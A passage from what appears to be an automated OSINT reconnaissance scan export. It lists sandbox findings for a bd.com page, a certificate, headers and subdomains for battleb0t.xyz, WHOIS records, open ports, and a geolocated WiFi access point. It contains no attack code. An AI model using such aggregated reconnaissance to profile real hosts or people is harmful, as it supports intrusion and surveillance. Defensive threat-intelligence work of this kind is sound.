u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-base.lc-f16c560e3c515940ffc44d9c4abc3ec3-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.bd.com/en-us/products-and-solutions/products/product-families/bd-alaris-guardrails-suite-mx#eifuresources', 
u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_e98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3736"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e98_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_e98_IE_EarlyTabStart_0xbdc_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e98_ConnHashTable<3736>_HashTable_Mutex"\n "IsoScope_e98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e98_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"151.101.1.229:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "104.18.11.207:443"\n "104.17.70.206:443"\n "104.19.188.97:443"\n "13.227.74.80:443"\n "185.199.108.153:443"\n "13.227.74.101:443"\n "172.64.144.98:443"\n "23.39.0.132:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accessibilityserver.org"\n "c.go-mpulse.net"\n "cdn.cookielaw.org"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "geolocation.onetrust.com"\n "go.bd.com"\n "malsup.github.io"\n "stackpath.bootstrapcdn.com"\n "tag.demandbase.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://www.linkedin.com/company/bd1?trk=biz-companies-cym" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/linkedin-black.svg" alt="Linked In" title="Linked In"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://www.facebook.com/BectonDickinsonandCo?ref=bookmarks" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/fb-black.svg" alt="Facebook" title="Facebook"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://twitter.com/BDandCo" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/Twitter-black.svg" alt="Twitter" title="Twitter"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://www.youtube.com/channel/UCPGmutY43EjP_3ijOugNGnA" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/youtube-black.svg" alt="Youtube" title="Youtube"/></a>" (Indicator: "dir "; File: 
"urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "* Copyright 2011-2021 Twitter, Inc." (Indicator: "dir "; File: "bootstrap.min_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"error_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPCM) density 118x118 segment length 16 progressive precision 8 5000x3337 components 3" and extension "jpg"\n "favicon_16_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-8701', u'name': u'Chained signature (with api-8700...). 
Detects file write then launch as executable', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1574', u'relevance': 8, u'threat_level': 0, u'type': 6, u'description': None}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "error_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPCM) density 118x118 segment length 16 progressive precision 8 5000x3337 components 3"- [targetUID: N/A]\n "clientlib-site.lc-bd09710473c40d28e121912e717b2ace-lc.min_1_.css" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "index.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "clientlib-site.lc-e51d492d6388e3a14ab136b2a7880775-lc.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "otBannerSdk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery-ui.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "clientlib-base.lc-f16c560e3c515940ffc44d9c4abc3ec3-lc.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro-Bold_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 30 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. This font may not be altered in any w"- [targetUID: N/A]\n "forms2.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro-Light_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 34 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. 
This font may not be altered in any w"- [targetUID: N/A]\n "22KRU-FA6KB-X6CHV-34PWY-E76NS_1_.js" has type "C source ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 30 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. This font may not be altered in any w"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"- [targetUID: N/A]\n "en_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "jquery.lc-7842899024219bcbdb5e72c946870b79-lc.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "raphael-min_1_.j | 185.199.108.153 |
| 2023-05-12 02:46:53 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
51:bc:8d:7a:19:49:b5:11:f4:b9:09:41:b5:bf:9e:b6:a0:1f:
30:6c:d0:86:d8:2e:1c:f6:c2:f3:8a:e9:28:07:3c:4c:1b:5d:
f4:93:c1:07:2c:53:ba:36:23:93:d1:2b:ae:40:d0:d7:9a:3d:
52:13:07:ac:5a:f9:bc:8e:9a:26:48:2d:63:da:42:87:4d:b8:
79:91:2d:a5:15:c9:8f:18:d0:19:dc:82:a0:c9:2f:ff:14:7f:
6e:d9:7c:10:fd:42:c5:1f:9f:69:db:a2:e3:f6:77:ca:6b:4d:
70:8d:c7:08:12:a2:cb:2b:e2:0f:fa:b5:ad:d0:98:5b:e2:5d:
54:f6:0b:28:1a:42:4d:c5:06:75:82:0f:6a:07:8d:19:7b:08:
12:7b:65:35:ae:e0:fb:30:c6:19:89:90:6c:f3:9f:d1:68:80:
fa:bb:16:fe:59:7b:6b:32:af:7b:3b:c0:6b:66:67:55:6e:9c:
27:ae:59:b7:71:9d:56:92:7b:0c:2b:27:d8:38:32:c8:ff:2f:
02:3f:56:f2:68:67:dc:8c:2f:a9:bc:e8:3a:f8:d6:0d:e4:fc:
ea:65:23:2c:d6:31:a2:34:ab:8b:fc:76:7c:26:2d:87:ae:ee:
a9:61:86:49:d1:02:02:98:49:50:4a:f8:24:91:f5:5d:f3:f7:
98:5f:57:37
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-served-by: cache-ewr18167-EWR | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Czech Republic | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
|
| 2023-05-12 02:44:18 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi.battleb0t.xyz |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | PERFECT PRIVACY, LLC | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:53:35 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 872A:0A4B:BBF254:10FE511:645C54E0
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100052-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683772640.067376,VS0,VE28
Vary: Accept-Encoding
X-Fastly-Request-ID: 13b6057c2e99facbd081defdf7bc9d1ff579d6e4
| 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f606c5dec334e-EWR | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2086 | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | apple network 06223f (Net ID: 00:02:2D:06:22:3F) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/login | login |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nuke.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
